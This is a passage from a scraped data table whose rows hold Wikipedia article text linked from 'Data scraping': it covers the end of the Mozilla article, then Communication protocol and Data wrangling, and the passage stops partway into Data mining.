Mozilla Hubs, as of May 31, 2024. 93 Mozilla Persona was a secure, cross-browser website authentication mechanism which allowed a user to use a single username and password (or other authentication method) to log into multiple sites. 94 Mozilla Persona shut down on November 30, 2016. 95 This free software crowdsourced geolocation service was started by Mozilla in 2013 and offers a free API. Mozilla Webmaker is Mozilla's educational initiative, and Webmaker's goal is to "help millions of people move from using the web to making the web. As part of Mozilla's non-profit mission, Webmaker aims "to help the world increase their understanding of the web, take greater control of their online lives, and create a more web literate planet. 96 97 Mozilla maintains a comprehensive developer documentation website called the MDN Web Docs which contains information about web technologies including HTML, CSS, SVG, JavaScript, as well as Mozilla-specific information. In addition, Mozilla publishes a large number of videos about web technologies and the development of Mozilla projects on the Air Mozilla website. 98 99 This was renamed to MDN Plus. In July 2017, Mozilla launched the project Common Voice to help make voice recognition open to everyone. 100 Visitors to the website can donate their voice to help build a free software voice recognition engine that anyone can use to make apps for devices and the web that make use of voice recognition. The website allows visitors to read a sentence to help the machine system learn how real people speak, as well as validate the read sentences of other people. Mozilla publishes Common Voice data sets under a CC 0 license. 101 On June 26, 2017, Mozilla launched IRL Online Life Is Real Life to explore popular stories from the web that deal with issues of the internet that affect society as a whole. 102 In February 2014, Mozilla released Directory Tiles, which showed Firefox users advertisements based on the users browser history, which was opt-in by default. 103 This feature was controversial, and prompted Mozilla to cancel the feature in December 2015. 104 On December 15, 2017, Mozilla installed an add-on in all Firefox Quantum browsers, titled "Looking Glass, with the description, “MY REALITY IS JUST DIFFERENT THAN YOURS, after a collaboration of Mozilla and the television show Mr. Robot. Mozilla received some criticism, as the add-on was installed without the user's knowledge or consent. On December 18, Mozilla issued an apology for the installation of the extension, and released the source code of the add-on. 105 106 In October 2017, Mozilla launched an experimental add-on using Cliqz technology to "less than one percent of users in Germany installing Firefox. Cliqz recommended results based on the user's browser history, which drew criticism from users. 107 108 In July 2020 Mozilla forced push notifications, an advertisement for its own blog post about Facebook 109 and Mozilla's StopHateForProfit campaign. These notifications were sent without user consent 110 and faced a backlash by Firefox users. In June 2024, Steve Teixeira, who was the CPO of Mozilla Corporation, filed a lawsuit against the company. Teixeira alleges that he faced discrimination and retaliation by Mozilla after taking three months off to receive cancer treatment, and that "immediately upon his return, Mozilla campaigned to demote or terminate Mr. Teixeira citing groundless concerns and assumptions about his capabilities as an individual living with cancer. 111 112 113 The Mozilla Community consists of over 40,000 active contributors from across the globe citation needed . It includes both paid employees and volunteers who work towards the goals set forth 28 in the Mozilla Manifesto. Many of the sub-communities in Mozilla have formed around localization efforts for Mozilla Firefox, and the Mozilla web properties. There are a number of sub-communities that exist based on their geographical locations, where contributors near each other work together on particular activities, such as localization, marketing, PR, and user support. In 2017, Mozilla created a Wireless Innovation for Network Security (WINS) 114 challenge that awarded a total of $2 million in prize money to innovators who used its decentralized design to create wireless solutions for post-natural disaster internet access. citation needed This challenge also envisioned connecting communities that lacked internet access. The Mozilla Reps program was a volunteer-based program, which allowed volunteers to become official representatives of Mozilla. Volunteers were required to be 18 years or older in order to participate in the program. Activities under the program included recruitment for contributors, workshops, and attending Mozilla summits. The initiative ended in 2023. 115 The Mozilla Festival (MozFest) is a unique hybrid: part art, tech, and society convening, part maker festival, and the premiere gathering for activists in diverse global movements fighting for a more humane digital world. Journalists, coders, filmmakers, designers, educators, gamers, makers, youth, and anyone else, from all over the world, are encouraged to attend, with nearly 10,000 participating virtually in 2021 from more than 87 countries, working together at the intersection of human rights, climate justice, and technology, specifically trustworthy artificial intelligence. The event revolves around key issues based on the chosen theme for that year's festival. MozFest unfolds over the span of two weeks, with more than 500 interactive sessions, films, talks, round-tables, hack-a-thons, exhibits, and socials. Topics range from privacy best practices, developing solutions to online misinformation and harassment, building free software tools, supporting Trustworthy AI innovations, and more. 116 The titles of the festival revolve around the main theme, freedom, and the Web. MozCamps are multi-day gatherings aimed at growing the contributor network by providing lectures, workshops, and breakout sessions led by Mozilla staff and volunteers. While these camps have been held in multiple locations globally in the past, none have occurred since 2014 update . 117 Mozilla Summit was a global event with active contributors and Mozilla employees who collaborated to develop a shared understanding of Mozilla's mission together. 118 Over 2,000 people representing 90 countries and 114 languages gathered in Santa Clara, Toronto, and Brussels in 2013. 119 Mozilla had its last Summit in 2017 and replaced them with smaller All Hands gatherings, where both employees and volunteers come together to collaborate. 35 |
361 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Protocol_(computing) | A communication protocol is a system of rules that allows two or more entities of a communications system to transmit information via any variation of a physical quantity. The protocol defines the rules, syntax, semantics, and synchronization of communication and possible error recovery methods. Protocols may be implemented by hardware, software, or a combination of both. 1 Communicating systems use well-defined formats for exchanging various messages. Each message has an exact meaning intended to elicit a response from a range of possible responses predetermined for that particular situation. The specified behavior is typically independent of how it is to be implemented. Communication protocols have to be agreed upon by the parties involved. 2 To reach an agreement, a protocol may be developed into a technical standard. A programming language describes the same for computations, so there is a close analogy between protocols and programming languages: protocols are to communication what programming languages are to computations. 3 An alternate formulation states that protocols are to communication what algorithms are to computation. 4 Multiple protocols often describe different aspects of a single communication. A group of protocols designed to work together is known as a protocol suite; when implemented in software they are a protocol stack. Internet communication protocols are published by the Internet Engineering Task Force (IETF). The IEEE (Institute of Electrical and Electronics Engineers) handles wired and wireless networking and the International Organization for Standardization (ISO) handles other types. The ITU-T handles telecommunications protocols and formats for the public switched telephone network (PSTN). As the PSTN and Internet converge, the standards are also being driven towards convergence. The first use of the term protocol in a modern data-commutation context occurs in April 1967 in a memorandum entitled A Protocol for Use in the NPL Data Communications Network. Under the direction of Donald Davies, who pioneered packet switching at the National Physical Laboratory in the United Kingdom, it was written by Roger Scantlebury and Keith Bartlett. 5 6 7 8 9 On the ARPANET, the starting point for host-to-host communication in 1969 was the 1822 protocol, written by Bob Kahn, which defined the transmission of messages to an IMP. 10 The Network Control Program (NCP) for the ARPANET, developed by Steve Crocker and other graduate students including Jon Postel and Vint Cerf, was first implemented in 1970. 11 The NCP interface allowed application software to connect across the ARPANET by implementing higher-level communication protocols, an early example of the protocol layering concept. 12 The CYCLADES network, designed by Louis Pouzin in the early 1970s was the first to implement the end-to-end principle, and make the hosts responsible for the reliable delivery of data on a packet-switched network, rather than this being a service of the network itself. 13 His team was the first to tackle the highly complex problem of providing user applications with a reliable virtual circuit service while using a best-effort service, an early contribution to what will be the Transmission Control Protocol (TCP). 14 15 16 Bob Metcalfe and others at Xerox PARC outlined the idea of Ethernet and the PARC Universal Packet (PUP) for internetworking. 17 Research in the early 1970s by Bob Kahn and Vint Cerf led to the formulation of the Transmission Control Program (TCP). 18 Its RFC 675 specification was written by Cerf with Yogen Dalal and Carl Sunshine in December 1974, still a monolithic design at this time. The International Network Working Group agreed on a connectionless datagram standard which was presented to the CCITT in 1975 but was not adopted by the CCITT nor by the ARPANET. 19 Separate international research, particularly the work of R mi Despr s, contributed to the development of the X.25 standard, based on virtual circuits, which was adopted by the CCITT in 1976. 20 21 Computer manufacturers developed proprietary protocols such as IBM's Systems Network Architecture (SNA), Digital Equipment Corporation's DECnet and Xerox Network Systems. 22 TCP software was redesigned as a modular protocol stack, referred to as TCP IP. This was installed on SATNET in 1982 and on the ARPANET in January 1983. The development of a complete Internet protocol suite by 1989, as outlined in RFC 1122 and RFC 1123, laid the foundation for the growth of TCP IP as a comprehensive protocol suite as the core component of the emerging Internet. 23 International work on a reference model for communication standards led to the OSI model, published in 1984. For a period in the late 1980s and early 1990s, engineers, organizations and nations became polarized over the issue of which standard, the OSI model or the Internet protocol suite, would result in the best and most robust computer networks. 24 25 26 The information exchanged between devices through a network or other media is governed by rules and conventions that can be set out in communication protocol specifications. The nature of communication, the actual data exchanged and any state-dependent behaviors, is defined by these specifications. In digital computing systems, the rules can be expressed by algorithms and data structures. Protocols are to communication what algorithms or programming languages are to computations. 3 4 Operating systems usually contain a set of cooperating processes that manipulate shared data to communicate with each other. This communication is governed by well-understood protocols, which can be embedded in the process code itself. 27 28 In contrast, because there is no shared memory, communicating systems have to communicate with each other using a shared transmission medium. Transmission is not necessarily reliable, and individual systems may use different hardware or operating systems. To implement a networking protocol, the protocol software modules are interfaced with a framework implemented on the machine's operating system. This framework implements the networking functionality of the operating system. 29 When protocol algorithms are expressed in a portable programming language the protocol software may be made operating system independent. The best-known frameworks are the TCP IP model and the OSI model. At the time the Internet was developed, abstraction layering had proven to be a successful design approach for both compiler and operating system design and, given the similarities between programming languages and communication protocols, the originally monolithic networking programs were decomposed into cooperating protocols. 30 This gave rise to the concept of layered protocols which nowadays forms the basis of protocol design. 31 Systems typically do not use a single protocol to handle a transmission. Instead they use a set of cooperating protocols, sometimes called a protocol suite. 32 Some of the best-known protocol suites are TCP IP, IPX SPX, X.25, AX.25 and AppleTalk. The protocols can be arranged based on functionality in groups, for instance, there is a group of transport protocols. The functionalities are mapped onto the layers, each layer solving a distinct class of problems relating to, for instance: application , transport , internet- and network interface-functions. 33 To transmit a message, a protocol has to be selected from each layer. The selection of the next protocol is accomplished by extending the message with a protocol selector for each layer. 34 There are two types of communication protocols, based on their representation of the content being carried: text-based and binary. 35 A text-based protocol or plain text protocol represents its content in human-readable format, often in plain text encoded in a machine-readable encoding such as ASCII or UTF 8, or in structured text-based formats such as Intel hex format, XML or JSON. The immediate human readability stands in contrast to native binary protocols which have inherent benefits for use in a computer environment (such as ease of mechanical parsing and improved bandwidth utilization). Network applications have various methods of encapsulating data. One method very common with Internet protocols is a text oriented representation that transmits requests and responses as lines of ASCII text, terminated by a newline character (and usually a carriage return character). Examples of protocols that use plain, human-readable text for its commands are FTP (File Transfer Protocol), SMTP (Simple Mail Transfer Protocol), early versions of HTTP (Hypertext Transfer Protocol), and the finger protocol. 36 Text-based protocols are typically optimized for human parsing and interpretation and are therefore suitable whenever human inspection of protocol contents is required, such as during debugging and during early protocol development design phases. A binary protocol utilizes all values of a byte, as opposed to a text-based protocol which only uses values corresponding to human-readable characters in ASCII encoding. Binary protocols are intended to be read by a machine rather than a human being. Binary protocols have the advantage of terseness, which translates into speed of transmission and interpretation. 37 Binary have been used in the normative documents describing modern standards like EbXML, HTTP 2, HTTP 3 and EDOC. 38 An interface in UML 39 may also be considered a binary protocol. Getting the data across a network is only part of the problem for a protocol. The data received has to be evaluated in the context of the progress of the conversation, so a protocol must include rules describing the context. These kinds of rules are said to express the syntax of the communication. Other rules determine whether the data is meaningful for the context in which the exchange takes place. These kinds of rules are said to express the semantics of the communication. Messages are sent and received on communicating systems to establish communication. Protocols should therefore specify rules governing the transmission. In general, much of the following should be addressed: 40 Systems engineering principles have been applied to create a set of common network protocol design principles. The design of complex protocols often involves decomposition into simpler, cooperating protocols. Such a set of cooperating protocols is sometimes called a protocol family or a protocol suite, 32 within a conceptual framework. Communicating systems operate concurrently. An important aspect of concurrent programming is the synchronization of software for receiving and transmitting messages of communication in proper sequencing. Concurrent programming has traditionally been a topic in operating systems theory texts. 50 Formal verification seems indispensable because concurrent programs are notorious for the hidden and sophisticated bugs they contain. 51 A mathematical approach to the study of concurrency and communication is referred to as communicating sequential processes (CSP). 52 Concurrency can also be modeled using finite state machines, such as Mealy and Moore machines. Mealy and Moore machines are in use as design tools in digital electronics systems encountered in the form of hardware used in telecommunication or electronic devices in general. 53 better source needed The literature presents numerous analogies between computer communication and programming. In analogy, a transfer mechanism of a protocol is comparable to a central processing unit (CPU). The framework introduces rules that allow the programmer to design cooperating protocols independently of one another. In modern protocol design, protocols are layered to form a protocol stack. Layering is a design principle that divides the protocol design task into smaller steps, each of which accomplishes a specific part, interacting with the other parts of the protocol only in a small number of well-defined ways. Layering allows the parts of a protocol to be designed and tested without a combinatorial explosion of cases, keeping each design relatively simple. The communication protocols in use on the Internet are designed to function in diverse and complex settings. Internet protocols are designed for simplicity and modularity and fit into a coarse hierarchy of functional layers defined in the Internet Protocol Suite. 54 The first two cooperating protocols, the Transmission Control Protocol (TCP) and the Internet Protocol (IP) resulted from the decomposition of the original Transmission Control Program, a monolithic communication protocol, into this layered communication suite. The OSI model was developed internationally based on experience with networks that predated the internet as a reference model for general communication with much stricter rules of protocol interaction and rigorous layering. Typically, application software is built upon a robust data transport layer. Underlying this transport layer is a datagram delivery and routing mechanism that is typically connectionless in the Internet. Packet relaying across networks happens over another layer that involves only network link technologies, which are often specific to certain physical layer technologies, such as Ethernet. Layering provides opportunities to exchange technologies when needed, for example, protocols are often stacked in a tunneling arrangement to accommodate the connection of dissimilar networks. For example, IP may be tunneled across an Asynchronous Transfer Mode (ATM) network. Protocol layering forms the basis of protocol design. 31 It allows the decomposition of single, complex protocols into simpler, cooperating protocols. 54 The protocol layers each solve a distinct class of communication problems. Together, the layers make up a layering scheme or model. Computations deal with algorithms and data; Communication involves protocols and messages; So the analog of a data flow diagram is some kind of message flow diagram. 4 To visualize protocol layering and protocol suites, a diagram of the message flows in and between two systems, A and B, is shown in figure 3. The systems, A and B, both make use of the same protocol suite. The vertical flows (and protocols) are in-system and the horizontal message flows (and protocols) are between systems. The message flows are governed by rules, and data formats specified by protocols. The blue lines mark the boundaries of the (horizontal) protocol layers. The software supporting protocols has a layered organization and its relationship with protocol layering is shown in figure 5. To send a message on system A, the top-layer software module interacts with the module directly below it and hands over the message to be encapsulated. The lower module fills in the header data in accordance with the protocol it implements and interacts with the bottom module which sends the message over the communications channel to the bottom module of system B. On the receiving system B the reverse happens, so ultimately the message gets delivered in its original form to the top module of system B. 55 Program translation is divided into subproblems. As a result, the translation software is layered as well, allowing the software layers to be designed independently. The same approach can be seen in the TCP IP layering. 56 The modules below the application layer are generally considered part of the operating system. Passing data between these modules is much less expensive than passing data between an application program and the transport layer. The boundary between the application layer and the transport layer is called the operating system boundary. 57 Strictly adhering to a layered model, a practice known as strict layering, is not always the best approach to networking. 58 Strict layering can have a negative impact on the performance of an implementation. 59 Although the use of protocol layering is today ubiquitous across the field of computer networking, it has been historically criticized by many researchers 60 as abstracting the protocol stack in this way may cause a higher layer to duplicate the functionality of a lower layer, a prime example being error recovery on both a per-link basis and an end-to-end basis. 61 Commonly recurring problems in the design and implementation of communication protocols can be addressed by software design patterns. 62 63 64 65 66 Popular formal methods of describing communication syntax are Abstract Syntax Notation One (an ISO standard) and augmented Backus Naur form (an IETF standard). Finite-state machine models are used to formally describe the possible interactions of the protocol. 67 68 and communicating finite-state machines 69 For communication to occur, protocols have to be selected. The rules can be expressed by algorithms and data structures. Hardware and operating system independence is enhanced by expressing the algorithms in a portable programming language. Source independence of the specification provides wider interoperability. Protocol standards are commonly created by obtaining the approval or support of a standards organization, which initiates the standardization process. The members of the standards organization agree to adhere to the work result on a voluntary basis. Often the members are in control of large market shares relevant to the protocol and in many cases, standards are enforced by law or the government because they are thought to serve an important public interest, so getting approval can be very important for the protocol. The need for protocol standards can be shown by looking at what happened to the Binary Synchronous Communications (BSC) protocol invented by IBM. BSC is an early link-level protocol used to connect two separate nodes. It was originally not intended to be used in a multinode network, but doing so revealed several deficiencies of the protocol. In the absence of standardization, manufacturers and organizations felt free to enhance the protocol, creating incompatible versions on their networks. In some cases, this was deliberately done to discourage users from using equipment from other manufacturers. There are more than 50 variants of the original bi-sync protocol. One can assume, that a standard would have prevented at least some of this from happening. 29 In some cases, protocols gain market dominance without going through a standardization process. Such protocols are referred to as de facto standards. De facto standards are common in emerging markets, niche markets, or markets that are monopolized (or oligopolized). They can hold a market in a very negative grip, especially when used to scare away competition. From a historical perspective, standardization should be seen as a measure to counteract the ill-effects of de facto standards. Positive exceptions exist; a de facto standard operating system like Linux does not have this negative grip on its market, because the sources are published and maintained in an open way, thus inviting competition. Some of the standards organizations of relevance for communication protocols are the International Organization for Standardization (ISO), the International Telecommunication Union (ITU), the Institute of Electrical and Electronics Engineers (IEEE), and the Internet Engineering Task Force (IETF). The IETF maintains the protocols in use on the Internet. The IEEE controls many software and hardware protocols in the electronics industry for commercial and consumer devices. The ITU is an umbrella organization of telecommunication engineers designing the public switched telephone network (PSTN), as well as many radio communication systems. For marine electronics the NMEA standards are used. The World Wide Web Consortium (W3C) produces protocols and standards for Web technologies. International standards organizations are supposed to be more impartial than local organizations with a national or commercial self-interest to consider. Standards organizations also do research and development for standards of the future. In practice, the standards organizations mentioned, cooperate closely with each other. 70 Multiple standards bodies may be involved in the development of a protocol. If they are uncoordinated, then the result may be multiple, incompatible definitions of a protocol, or multiple, incompatible interpretations of messages; important invariants in one definition (e.g., that time-to-live values are monotone decreasing to prevent stable routing loops) may not be respected in another. 71 In the ISO, the standardization process starts off with the commissioning of a sub-committee workgroup. The workgroup issues working drafts and discussion documents to interested parties (including other standards bodies) in order to provoke discussion and comments. This will generate a lot of questions, much discussion and usually some disagreement. These comments are taken into account and a draft proposal is produced by the working group. After feedback, modification, and compromise the proposal reaches the status of a draft international standard, and ultimately an international standard. International standards are reissued periodically to handle the deficiencies and reflect changing views on the subject. 72 A lesson learned from ARPANET, the predecessor of the Internet, was that protocols need a framework to operate. It is therefore important to develop a general-purpose, future-proof framework suitable for structured protocols (such as layered protocols) and their standardization. This would prevent protocol standards with overlapping functionality and would allow clear definition of the responsibilities of a protocol at the different levels (layers). 74 This gave rise to the Open Systems Interconnection model (OSI model), which is used as a framework for the design of standard protocols and services conforming to the various layer specifications. 75 In the OSI model, communicating systems are assumed to be connected by an underlying physical medium providing a basic transmission mechanism. The layers above it are numbered. Each layer provides service to the layer above it using the services of the layer immediately below it. The top layer provides services to the application process. The layers communicate with each other by means of an interface, called a service access point. Corresponding layers at each system are called peer entities. To communicate, two peer entities at a given layer use a protocol specific to that layer which is implemented by using services of the layer below. 76 For each layer, there are two types of standards: protocol standards defining how peer entities at a given layer communicate, and service standards defining how a given layer communicates with the layer above it. In the OSI model, the layers and their functionality are (from highest to lowest layer): In contrast to the TCP IP layering scheme, which assumes a connectionless network, RM OSI assumed a connection-oriented network. 84 Connection-oriented networks are more suitable for wide area networks and connectionless networks are more suitable for local area networks. Connection-oriented communication requires some form of session and (virtual) circuits, hence the (in the TCP IP model lacking) session layer. The constituent members of ISO were mostly concerned with wide area networks, so the development of RM OSI concentrated on connection-oriented networks and connectionless networks were first mentioned in an addendum to RM OSI 85 86 and later incorporated into an update to RM OSI. 87 At the time, when? the IETF had to cope with this and the fact that the Internet needed protocols that simply were not there. citation needed As a result, the IETF developed its own standardization process based on "rough consensus and running code". 88 The standardization process is described by RFC 2026. Nowadays, the IETF has become a standards organization for the protocols in use on the Internet. RM OSI has extended its model to include connectionless services and because of this, both TCP and IP could be developed into international standards. citation needed The wire image of a protocol is the information that a non-participant observer is able to glean from observing the protocol messages, including both information explicitly given meaning by the protocol, but also inferences made by the observer. 89 Unencrypted protocol metadata is one source making up the wire image, and side-channels including packet timing also contribute. 90 Different observers with different vantages may see different wire images. 91 The wire image is relevant to end-user privacy and the extensibility of the protocol. 92 If some portion of the wire image is not cryptographically authenticated, it is subject to modification by intermediate parties (i.e., middleboxes), which can influence protocol operation. 90 Even if authenticated, if a portion is not encrypted, it will form part of the wire image, and intermediate parties may intervene depending on its content (e.g., dropping packets with particular flags). Signals deliberately intended for intermediary consumption may be left authenticated but unencrypted. 93 The wire image can be deliberately engineered, encrypting parts that intermediaries should not be able to observe and providing signals for what they should be able to. 94 If provided signals are decoupled from the protocol's operation, they may become untrustworthy. 95 Benign network management and research are affected by metadata encryption; protocol designers must balance observability for operability and research against ossification resistance and end-user privacy. 92 The IETF announced in 2014 that it had determined that large-scale surveillance of protocol operations is an attack due to the ability to infer information from the wire image about users and their behaviour, 96 and that the IETF would "work to mitigate pervasive monitoring" in its protocol designs; 97 this had not been done systematically previously. 97 The Internet Architecture Board recommended in 2023 that disclosure of information by a protocol to the network should be intentional, 98 performed with the agreement of both recipient and sender, 99 authenticated to the degree possible and necessary, 100 only acted upon to the degree of its trustworthiness, 101 and minimised and provided to a minimum number of entities. 102 103 Engineering the wire image and controlling what signals are provided to network elements was a "developing field" in 2023, according to the IAB. 104 Protocol ossification is the loss of flexibility, extensibility and evolvability of network protocols. This is largely due to middleboxes that are sensitive to the wire image of the protocol, and which can interrupt or interfere with messages that are valid but which the middlebox does not correctly recognize. 105 This is a violation of the end-to-end principle. 106 Secondary causes include inflexibility in endpoint implementations of protocols. 107 Ossification is a major issue in Internet protocol design and deployment, as it can prevent new protocols or extensions from being deployed on the Internet, or place strictures on the design of new protocols; new protocols may have to be encapsulated in an already-deployed protocol or mimic the wire image of another protocol. 108 Because of ossification, the Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) are the only practical choices for transport protocols on the Internet, 109 and TCP itself has significantly ossified, making extension or modification of the protocol difficult. 110 Recommended methods of preventing ossification include encrypting protocol metadata, 111 and ensuring that extension points are exercised and wire image variability is exhibited as fully as possible; 112 remedying existing ossification requires coordination across protocol participants. 113 QUIC is the first IETF transport protocol to have been designed with deliberate anti-ossification properties. 89 Classification schemes for protocols usually focus on the domain of use and function. As an example of domain of use, connection-oriented protocols and connectionless protocols are used on connection-oriented networks and connectionless networks respectively. An example of function is a tunneling protocol, which is used to encapsulate packets in a high-level protocol so that the packets can be passed across a transport system using the high-level protocol. A layering scheme combines both function and domain of use. The dominant layering schemes are the ones developed by the IETF and by ISO. Despite the fact that the underlying assumptions of the layering schemes are different enough to warrant distinguishing the two, it is a common practice to compare the two by relating common protocols to the layers of the two schemes. 114 The layering scheme from the IETF is called Internet layering or TCP IP layering. The layering scheme from ISO is called the OSI model or ISO layering. In networking equipment configuration, a term-of-art distinction is often drawn: The term protocol strictly refers to the transport layer, and the term service refers to protocols utilizing a protocol for transport. In the common case of TCP and UDP, services are distinguished by port numbers. Conformance to these port numbers is voluntary, so in content inspection systems the term service strictly refers to port numbers, and the term application is often used to refer to protocols identified through inspection signatures. |
362 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_wrangling | Data wrangling, sometimes referred to as data munging, is the process of transforming and mapping data from one "raw" data form into another format with the intent of making it more appropriate and valuable for a variety of downstream purposes such as analytics. The goal of data wrangling is to assure quality and useful data. Data analysts typically spend the majority of their time in the process of data wrangling compared to the actual analysis of the data. The process of data wrangling may include further munging, data visualization, data aggregation, training a statistical model, as well as many other potential uses. Data wrangling typically follows a set of general steps which begin with extracting the data in a raw form from the data source, "munging" the raw data (e.g. sorting) or parsing the data into predefined data structures, and finally depositing the resulting content into a data sink for storage and future use. 1 It is closely aligned with the ETL process. The "wrangler" non-technical term is often said to derive from work done by the United States Library of Congress's National Digital Information Infrastructure and Preservation Program (NDIIPP) and their program partner the Emory University Libraries based MetaArchive Partnership. The term "mung" has roots in munging as described in the Jargon File. 2 The term "data wrangler" was also suggested as the best analogy to describe someone working with data. 3 One of the first mentions of data wrangling in a scientific context was by Donald Cline during the NASA NOAA Cold Lands Processes Experiment. 4 Cline stated the data wranglers "coordinate the acquisition of the entire collection of the experiment data. Cline also specifies duties typically handled by a storage administrator for working with large amounts of data. This can occur in areas like major research projects and the making of films with a large amount of complex computer-generated imagery. In research, this involves both data transfer from research instrument to storage grid or storage facility as well as data manipulation for re-analysis via high-performance computing instruments or access via cyberinfrastructure-based digital libraries. With the upcoming of artificial intelligence in data science it has become increasingly important for automation of data wrangling to have very strict checks and balances, which is why the munging process of data has not been automated by machine learning. Data munging requires more than just an automated solution, it requires knowledge of what information should be removed and artificial intelligence is not to the point of understanding such things. 5 Data wrangling is a superset of data mining and requires processes that some data mining uses, but not always. The process of data mining is to find patterns within large data sets, where data wrangling transforms data in order to deliver insights about that data. Even though data wrangling is a superset of data mining does not mean that data mining does not use it, there are many use cases for data wrangling in data mining. Data wrangling can benefit data mining by removing data that does not benefit the overall set, or is not formatted properly, which will yield better results for the overall data mining process. An example of data mining that is closely related to data wrangling is ignoring data from a set that is not connected to the goal: say there is a data set related to the state of Texas and the goal is to get statistics on the residents of Houston, the data in the set related to the residents of Dallas is not useful to the overall set and can be removed before processing to improve the efficiency of the data mining process. With an increase of raw data comes an increase in the amount of data that is not inherently useful, this increases time spent on cleaning and organizing data before it can be analyzed which is where data wrangling comes into play. The result of data wrangling can provide important metadata statistics for further insights about the data, it is important to ensure metadata is consistent otherwise it can cause roadblocks. Data wrangling allows analysts to analyze more complex data more quickly, achieve more accurate results, and because of this better decisions can be made. Many businesses have moved to data wrangling because of the success that it has brought. The main steps in data wrangling are as follows: This all-encompassing term describes how to understand your data. This is the first step to familiarize yourself with your data. These steps are an iterative process that should yield a clean and usable data set that can then be used for analysis. This process is tedious but rewarding as it allows analysts to get the information they need out of a large set of data that would otherwise be unreadable. The result of using the data wrangling process on this small data set shows a significantly easier data set to read. All names are now formatted the same way, first name last name , phone numbers are also formatted the same way area code-XXX-XXXX , dates are formatted numerically YYYY-mm-dd , and states are no longer abbreviated. The entry for Jacob Alan did not have fully formed data (the area code on the phone number is missing and the birth date had no year), so it was discarded from the data set. Now that the resulting data set is cleaned and readable, it is ready to be either deployed or evaluated. The data transformations are typically applied to distinct entities (e.g. fields, rows, columns, data values, etc.) within a data set, and could include such actions as extractions, parsing, joining, standardizing, augmenting, cleansing, consolidating, and filtering to create desired wrangling outputs that can be leveraged downstream. The recipients could be individuals, such as data architects or data scientists who will investigate the data further, business users who will consume the data directly in reports, or systems that will further process the data and write it into targets such as data warehouses, data lakes, or downstream applications. Depending on the amount and format of the incoming data, data wrangling has traditionally been performed manually (e.g. via spreadsheets such as Excel), tools like KNIME or via scripts in languages such as Python or SQL. R, a language often used in data mining and statistical data analysis, is now also sometimes used for data wrangling. 6 Data wranglers typically have skills sets within: R or Python, SQL, PHP, Scala, and more languages typically used for analyzing data. Visual data wrangling systems were developed to make data wrangling accessible for non-programmers, and simpler for programmers. Some of these also include embedded AI recommenders and programming by example facilities to provide user assistance, and program synthesis techniques to autogenerate scalable dataflow code. Early prototypes of visual data wrangling tools include OpenRefine and the Stanford Berkeley Wrangler research system; 7 the latter evolved into Trifacta. Other terms for these processes have included data franchising, 8 data preparation, and data munging. Given a set of data that contains information on medical patients your goal is to find correlation for a disease. Before you can start iterating through the data ensure that you have an understanding of the result, are you looking for patients who have the disease? Are there other diseases that can be the cause? Once an understanding of the outcome is achieved then the data wrangling process can begin. Start by determining the structure of the outcome, what is important to understand the disease diagnosis. Once a final structure is determined, clean the data by removing any data points that are not helpful or are malformed, this could include patients that have not been diagnosed with any disease. After cleaning look at the data again, is there anything that can be added to the data set that is already known that would benefit it? An example could be most common diseases in the area, America and India are very different when it comes to most common diseases. Now comes the validation step, determine validation rules for which data points need to be checked for validity, this could include date of birth or checking for specific diseases. After the validation step the data should now be organized and prepared for either deployment or evaluation. This process can be beneficial for determining correlations for disease diagnosis as it will reduce the vast amount of data into something that can be easily analyzed for an accurate result. |
363 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_mining | Data mining is the process of extracting and discovering patterns in large data sets involving methods at the intersection of machine learning, statistics, and database systems. 1 Data mining is an interdisciplinary subfield of computer science and statistics with an overall goal of extracting information (with intelligent methods) from a data set and transforming the information into a comprehensible structure for further use. 1 2 3 4 Data mining is the analysis step of the "knowledge discovery in databases" process, or KDD. 5 Aside from the raw analysis step, it also involves database and data management aspects, data pre-processing, model and inference considerations, interestingness metrics, complexity considerations, post-processing of discovered structures, visualization, and online updating. 1 The term "data mining" is a misnomer because the goal is the extraction of patterns and knowledge from large amounts of data, not the extraction (mining) of data itself. 6 It also is a buzzword 7 and is frequently applied to any form of large-scale data or information processing (collection, extraction, warehousing, analysis, and statistics) as well as any application of computer decision support system, including artificial intelligence (e.g., machine learning) and business intelligence. Often the more general terms (large scale) data analysis and analytics—or, when referring to actual methods, artificial intelligence and machine learning—are more appropriate. The actual data mining task is the semi-automatic or automatic analysis of large quantities of data to extract previously unknown, interesting patterns such as groups of data records (cluster analysis), unusual records (anomaly detection), and dependencies (association rule mining, sequential pattern mining). This usually involves using database techniques such as spatial indices. These patterns can then be seen as a kind of summary of the input data, and may be used in further analysis or, for example, in machine learning and predictive analytics. For example, the data mining step might identify multiple groups in the data, which can then be used to obtain more accurate prediction results by a decision support system. Neither the data collection, data preparation, nor result interpretation and reporting is part of the data mining step, although they do belong to the overall KDD process as additional steps. The difference between data analysis and data mining is that data analysis is used to test models and hypotheses on the dataset, e.g., analyzing the effectiveness of a marketing campaign, regardless of the amount of data. In contrast, data mining uses machine learning and statistical models to uncover clandestine or hidden patterns in a large volume of data. 8 The related terms data dredging, data fishing, and data snooping refer to the use of data mining methods to sample parts of a larger population data set that are (or may be) too small for reliable statistical inferences to be made about the validity of any patterns discovered. These methods can, however, be used in creating new hypotheses to test against the larger data populations. In the 1960s, statisticians and economists used terms like data fishing or data dredging to refer to what they considered the bad practice of analyzing data without an a-priori hypothesis. The term "data mining" was used in a similarly critical way by economist Michael Lovell in an article published in the Review of Economic Studies in 1983. 9 10 Lovell indicates that the practice "masquerades under a variety of aliases, ranging from "experimentation" (positive) to "fishing" or "snooping" (negative). The term data mining appeared around 1990 in the database community, with generally positive connotations. For a short time in 1980s, the phrase "database mining" , was used, but since it was trademarked by HNC, a San Diego-based company, to pitch their Database Mining Workstation; 11 researchers consequently turned to data mining. Other terms used include data archaeology, information harvesting, information discovery, knowledge extraction, etc. Gregory Piatetsky-Shapiro coined the term "knowledge discovery in databases" for the first workshop on the same topic (KDD 1989) and this term became more popular in the AI and machine learning communities. However, the term data mining became more popular in the business and press communities. 12 Currently, the terms data mining and knowledge discovery are used interchangeably. The manual extraction of patterns from data has occurred for centuries. Early methods of identifying patterns in data include Bayes' theorem (1700s) and regression analysis (1800s). 13 The proliferation, ubiquity and increasing power of computer technology have dramatically increased data collection, storage, and manipulation ability. As data sets have grown in size and complexity, direct "hands-on" data analysis has increasingly been augmented with indirect, automated data processing, aided by other discoveries in computer science, specially in the field of machine learning, such as neural networks, cluster analysis, genetic algorithms (1950s), decision trees and decision rules (1960s), and support 